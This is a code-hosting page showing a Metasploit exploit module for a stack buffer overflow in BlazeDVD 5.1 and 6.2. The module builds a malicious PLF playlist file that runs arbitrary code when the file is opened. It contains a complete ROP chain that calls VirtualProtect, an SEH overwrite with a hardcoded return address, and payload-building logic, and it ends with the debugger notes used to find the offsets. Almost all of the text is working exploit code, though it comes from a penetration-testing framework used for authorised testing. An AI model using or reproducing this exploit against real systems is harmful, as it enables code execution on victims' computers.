Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/blazedvd_plf.rb
32007 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When

18
          the application is used to open a specially crafted plf file,

19
          a buffer is overwritten allowing for the execution of arbitrary code.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'Deepak Rathore' # ExploitDB PoC

24
        ],

25
        'References' => [

26
          [ 'CVE', '2006-6199' ],

27
          [ 'EDB', '32737' ],

28
          [ 'OSVDB', '30770' ],

29
          [ 'BID', '35918' ],

30
        ],

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process',

33
          'AllowWin32SEH' => true

34
        },

35
        'Payload' => {

36
          'Space' => 750,

37
          'BadChars' => "\x00\x0a\x1a",

38
          'DisableNops' => true

39
        },

40


41
        'Platform' => 'win',

42
        'Targets' => [

43
          [

44
            'BlazeDVD 6.2',

45
            {

46
              'Author' => [ 'Ken Smith', 'Spencer McIntyre' ],

47
              'Payload' =>

48
                {

49
                  # Stackpivot => add esp,0xfffff254

50
                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"

51
                }

52
            }

53
          ],

54
          [

55
            'BlazeDVD 5.1',

56
            {

57
              'Author' => 'MC',

58
              'Ret' => 0x100101e7,

59
              'Payload' =>

60
                {

61
                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper

62
                }

63
            }

64
          ],

65
        ],

66
        'Privileged' => false,

67
        'DisclosureDate' => '2009-08-03',

68
        'DefaultTarget' => 0,

69
        'Notes' => {

70
          'Stability' => [ CRASH_SERVICE_DOWN, ],

71
          'SideEffects' => [ SCREEN_EFFECTS, ],

72
          'Reliability' => UNKNOWN_RELIABILITY,

73
        }

74
      )

75
    )

76


77
    register_options(

78
      [

79
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),

80
      ]

81
    )

82
  end

83


84
  def rop_chain

85
    # rop chain generated with mona.py - www.corelan.be

86
    case target.name

87
    when 'BlazeDVD 6.2'

88
      rop_gadgets = [ ]

89
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]

90
      rop_gadgets.fill(0x6162e802, 0..7)

91
      rop_gadgets += [

92
        0x61636758, # POP EAX # RETN [EPG.dll]

93
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]

94
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]

95
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]

96
        0x61628ea2, # POP EBP # RETN [EPG.dll]

97
        0x616069a1, # push esp # ret 0x04 [EPG.dll]

98
        0x61626702, # POP EAX # RETN [EPG.dll]

99
        0xfffffdff, # Value to negate, will become 0x00000201

100
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

101
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]

102
        0x61629938, # POP EAX # RETN [EPG.dll]

103
        0xffffffc0, # Value to negate, will become 0x00000040

104
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

105
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]

106
        0x61612f5a, # POP ECX # RETN [EPG.dll]

107
        0x100142ab, # &Writable location [SkinScrollBar.Dll]

108
        0x616313ac, # POP EDI # RETN [EPG.dll]

109
        0x6162e588, # RETN (ROP NOP) [EPG.dll]

110
        0x6162d638, # POP EAX # RETN [EPG.dll]

111
        0x90909090, # nop

112
        0x61620831, # PUSHAD # RETN [EPG.dll]

113
      ]

114
    end

115
    return rop_gadgets.flatten.pack("V*")

116
  end

117


118
  def exploit

119
    case target.name

120
    when 'BlazeDVD 5.1'

121
      plf = rand_text_alpha_upper(6024)

122
      plf[868, 8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')

123
      plf[876, 12] = make_nops(12)

124
      plf[888, payload.encoded.length] = payload.encoded

125
    when 'BlazeDVD 6.2'

126
      plf = rand_text_alphanumeric(260)

127
      plf << rop_chain

128
      plf << payload.encoded

129
    end

130


131
    print_status("Creating '#{datastore['FILENAME']}' file ...")

132
    file_create(plf)

133
  end

134
end

135


136
=begin

137
0:000> !exchain

138
0012f2c8: 31644230

139
Invalid exception stack at 64423963

140
0:000> !pattern_offset 6024 0x31644230

141
[Byakugan] Control of 0x31644230 at offset 872.

142
0:000> !pattern_offset 6024 0x64423963

143
[Byakugan] Control of 0x64423963 at offset 868.

144
0:000> s -b 0x10000000 0x10018000 5e 59 c3

145
100012cd  5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00  ^Y.V.t$.W..V..<.

146
100101e7  5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24  ^Y........D$..L$

147
0:000> u 0x100012cd L3

148
skinscrollbar!SkinSB_ParentWndProc+0x1fd:

149
100012cd 5e              pop     esi

150
100012ce 59              pop     ecx

151
100012cf c3              ret

152
=end

153


154